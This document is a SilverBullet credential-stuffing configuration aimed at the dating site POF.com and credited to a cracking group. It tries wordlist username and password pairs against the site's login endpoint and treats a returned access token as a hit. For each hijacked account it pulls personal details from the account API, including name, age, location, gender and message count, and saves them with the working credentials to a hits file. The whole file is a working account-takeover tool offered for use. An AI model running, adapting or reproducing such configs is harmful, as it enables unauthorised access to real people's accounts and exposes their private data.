[SETTINGS]
{
  "Name": "POF.Com",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-04-20T15:10:32.6223115+04:30",
  "AdditionalInfo": "@Core_Crack And Owner: @DrConfiger",
  "RequiredPlugins": [],
  "Author": "DrConfiger",
  "Version": "1.1.1 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "POF",
  "IconPath": "Icon\\svbfile.ico",
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#ua FUNCTION GetRandomUA -> VAR "ua" 

#Get REQUEST GET "https://www.pof.com/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#installId PARSE "<COOKIES(installid)>" LR "" "" -> VAR "installId" 

#POST REQUEST POST "https://login.pof.com/" 
  CONTENT "installId=<installId>&password=<PASS>&rememberMe=false&useTokenPair=true&username=<USER>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.pof.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"90\", \"Google Chrome\";v=\"90\"" 
  HEADER "Accept: application/json" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: <ua>" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Origin: https://www.pof.com" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://www.pof.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9,tr;q=0.8,fa;q=0.7" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 138" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Bad Request" 
  KEYCHAIN Success OR 
    KEY "<HEADERS(Authorization)>" Contains "access" 

#access PARSE "<COOKIES(access)>" LR "" "" -> VAR "access" 

#Request-Context PARSE "<HEADERS(Request-Context)>" LR "" "" -> VAR "Request-Context" 

#Account REQUEST POST "https://www.pof.com/apiv1/Account/Me" 
  CONTENT "{\"FetchHighlight\":true}" 
  CONTENTTYPE "application/json" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://www.pof.com" 
  HEADER "Referer: https://www.pof.com/login" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Host: www.pof.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: application/json" 
  HEADER "Authorization: access <access>" 
  HEADER "Request-Context: <Request-Context>" 
  HEADER "Request-Id: |ya1Qr.TrjhM" 
  HEADER "User-Agent: <ua>" 

#First-Name PARSE "<SOURCE>" JSON "firstname" CreateEmpty=FALSE -> CAP "First Name" 

#Username PARSE "<SOURCE>" JSON "username" CreateEmpty=FALSE -> CAP "Username" 

#Age PARSE "<SOURCE>" LR "\"age\":" "," CreateEmpty=FALSE -> CAP "Age" 

#Country PARSE "<SOURCE>" JSON "country" CreateEmpty=FALSE -> CAP "Country" 

#State PARSE "<SOURCE>" JSON "state" CreateEmpty=FALSE -> CAP "State" 

#Gender PARSE "<SOURCE>" JSON "gender" CreateEmpty=FALSE -> CAP "Gender" "" "  0:male/1:female" 

#profileId PARSE "<SOURCE>" JSON "profileId" CreateEmpty=FALSE -> CAP "profileId" 

#lastOnline PARSE "<SOURCE>" JSON "lastOnline" CreateEmpty=FALSE -> CAP "lastOnline" 

#daysSinceRegistration PARSE "<SOURCE>" JSON "daysSinceRegistration" CreateEmpty=FALSE -> CAP "daysSinceRegistration" 

#messageCount PARSE "<SOURCE>" JSON "messageCount" CreateEmpty=FALSE -> CAP "messageCount" 

#loginCount PARSE "<SOURCE>" JSON "loginCount" CreateEmpty=FALSE -> CAP "loginCount" 

#loggedIn PARSE "<SOURCE>" JSON "loginCount" CreateEmpty=FALSE -> CAP "loggedIn" 

#upgraded PARSE "<SOURCE>" JSON "upgraded" CreateEmpty=FALSE -> CAP "upgraded" 

#Auto_Save UTILITY File "PofHits.txt" Write "<USER>:<PASS> Details=== First Name : <First Name> ,Username: <Username>,Age: <Age> , Country: <Country>,State: <State> ,Gender: <Gender>,profileId :<profileId> , lastOnline: <lastOnline>,daysSinceRegistration: <daysSinceRegistration>,messageCount:  <messageCount>, loginCount: <loginCount>, loggedIn: <loggedIn>,upgraded: <upgraded>,\\r\\n--------------@Core_Crack And Owner: @DrConfiger" 

